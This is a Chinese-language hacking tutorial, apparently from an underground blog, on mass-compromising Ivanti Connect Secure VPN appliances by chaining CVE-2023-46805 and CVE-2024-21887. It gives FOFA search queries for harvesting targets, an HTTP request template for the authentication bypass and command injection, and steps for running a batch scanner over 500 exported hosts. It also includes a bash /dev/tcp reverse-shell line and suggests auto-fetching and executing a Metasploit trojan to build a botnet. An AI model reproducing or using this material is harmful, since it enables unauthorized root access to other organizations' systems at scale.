雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
点击查看-X黑手网
点击查看-X黑手网
使用CVE2024-21887进行批量getshell抓鸡

使用CVE2024-21887进行批量getshell抓鸡

前言:

感谢凌冰科技的空投稿,

前段时间,受委托,需要写一篇批量getshell抓鸡的教程。于是选择了struts2漏洞作为讲解对象。可是在测试、写教程的过程中,屡屡碰到安全设备的情况。如防特,F5,由于上头了,开始了为期三天的getshell,免杀制作测试,提权。经过不懈努力,全部失败在提权部分。经过一天的反思,决定放弃,重新挑选漏洞和目标。Struts2这种老洞能存在,要么被打过数次,要么就是有很新的安全设备。为了写本文章的目的,决定研究一个最近的洞,并以此为教程例子。

image

经过十次的脚本迭代,完整版的exp终于在今天弄完,开始以此为起点教授批量getshell。

注:下面几张图是上次失败教程部分截图, 。

推荐阅读:

fofa配合afrog通过struts2loud批量抓鸡-X黑手网

image

image

image

image

image

image

好了,正文开始。

批量getshell,那必须提到网络空间测绘。比如fofa,shadon,本文使用fofa.

漏洞资产

image

lvanti Connect Secure,原名Pulse Connect Secure,是一款企业级远程访问解决方案。这个产品主要提供安全远程访问(VPN),多因素认证等功能。

它的页面长这样:

影响范围

Ivanti Connect Secure (9.x, 22.x)

Ivanti Policy Secure (9.x, 22.x)

漏洞介绍:

lvanti Connect Secure (9.x, 22.x)和vanti Policy Secure (9.x,22.x)的web组件中存在身份验证绕过漏洞(CVE-2023-46805)和命令注入漏洞(CVE-2024-21887),成功利用该漏洞链允许远程未经认证的攻击者以root权限执行任意操作系统命令,导致服务器失陷。

资产测绘:

Fofa使用下面语句可查找符合条件资产

body=”welcome.cgi?p=logo”

title==”Ivanti Connect Secure”body=”/dana-na/auth/url_default/welcome.cgi”

(感谢某沙雕的语法分享)。

我个人喜欢第二个语法,搜索结果更精确,但是资产更少

image

image

首先,fofa导出我们需要的资产。本次导出为500条数据。

image

此次exp为组合漏洞,漏洞POC

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3b你自己的系统命令%3b HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36

Connection: close

Accept-Encoding: gzip, deflate

漏洞复现:发送如图数据包,DNSlog平台成功收到查询信息。证明存在系统命令注入。

image

image

将我们导出的数据保存为x.txt,因为有些数据为IP地址,requests模块无法正常发包。直接将IP地址补全为https格式,使部分存在漏洞的IP可以通过此exp进行攻击。

image

首先使用此命令

image

image

完成之后使用cheak.Py

python .\cheak.py .\x.txt

因为保存的数据中存在着好几个IP地址。

可以看看效果

image

使用-f指令读取文件,-o指令输出结果。

image

运行截图。其中,绿色存在可验证的漏洞,红色为发送payload失败的地址,并附带了失败原因。

image

文件夹里面也出现了对应的结果

image

得到漏洞地址,开始单独使用exp:

image

脚本里我内置了ID参数,并使用了argparse等库创建了一个shell终端并进行指令传参。

做做验证:

image

连接VPS:

image

监听9901端口。

bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9901 0>&1

image

可以看到shell正常运行。

image

更换另一个漏洞地址测试:

image

监听另外一个端口:

image

image

同样成功getshell。

接下来就是重复这个过程,然后shell管理。推荐msf或者cs。

其实,直接生成msf马,放在服务器端,将我内置的执行代码ID改为wget木马然后执行,这样,扫描的过程中就可以做到msf getshell。这种才是真正的全自动getshell。这种思路,就留给兄弟们去开发了,我要跑路了,切记exp千万不要乱传,有问题在群里@我(空)或者群主。

工具下载:

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容